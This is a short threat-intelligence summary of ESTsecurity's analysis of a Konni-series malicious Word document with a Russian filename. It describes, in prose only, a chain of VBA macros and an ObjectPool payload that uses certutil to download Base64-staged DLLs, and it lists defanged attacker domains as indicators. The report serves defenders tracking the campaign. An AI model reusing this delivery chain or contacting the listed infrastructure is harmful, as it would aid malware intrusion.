ESTsecurity analyzed a Konni-series malicious Word document using a Russian filename about the Korean Peninsula and U.S.–DPRK dialogue, while internal code-page artifacts showed Korean-language build characteristics. The document contains VBA macros and an ObjectPool payload that launches certutil to download and decode Base64-staged files from handicap.eu5[.]org, then loads 32-bit or 64-bit DLL payloads and retrieves attacker-controlled configuration. ESRC links the tradecraft to earlier Konni activity, including a January 2019 Russian-language decoy document, because the macro structure, ObjectPool-hidden C2 logic and staged CAB/DLL delivery pattern closely match prior samples. The report highlights C2 and payload infrastructure such as handicap.eu5[.]org and clean.1apps[.]com, plus MD5 hashes for the analyzed documents and payloads, as evidence for defenders tracking Konni operations.